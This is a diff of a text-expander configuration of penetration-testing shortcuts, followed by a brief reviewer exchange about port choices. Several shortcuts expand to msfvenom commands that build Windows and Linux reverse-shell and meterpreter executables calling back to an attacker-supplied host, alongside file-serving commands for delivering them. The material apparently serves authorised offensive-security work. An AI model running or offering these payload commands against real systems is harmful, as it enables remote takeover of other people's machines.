dots/base.yml

```diff
@@ -47,58 +57,68 @@ matches:
       python3 -m http.server 80
 
   - trigger: ":msfwin"
-    replace: msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 -f exe -o shell.exe LHOST=
+    replace: msfvenom -p windows/x64/shell_reverse_tcp LHOST={{IP}} LPORT=22 -f exe -o shell.exe
 
   - trigger: ":msfmwin"
-    replace: msfvenom -p windows/x64/meterpreter_reverse_tcp LPORT=443 -f exe -o shell.exe LHOST=
-
-  - trigger: ":msflin"
-    replace: msfvenom -p linux/x64/shell_reverse_tcp LPORT=443 -f elf -o shell.elf LHOST=
+    replace: msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST={{IP}} LPORT=22 -f exe -o shell.exe
 
-  - trigger: ":msfmlin"
-    replace: msfvenom -p linux/x64/meterpreter_reverse_tcp LPORT=443 -f elf -o shell.elf LHOST=
-
-  - trigger: ":smb"
+  - trigger: ":smbserver"
     replace: "impacket-smbserver -smb2support share ."
 
   - trigger: ":pyserver"
-    replace: "python3 -m http.server"
-  
-  - trigger: ":phpserver"
-    replace: "php -S 0.0.0.0:"
+    replace: "python3 -m http.server 80"
```

Comment:
no dog?? whyt remove php why the pyhton one allows you to add 80 on command.... ur doing too much

Reply:
you won't always have 80 available especially when you are using responder... trust me i dont make it modular for fun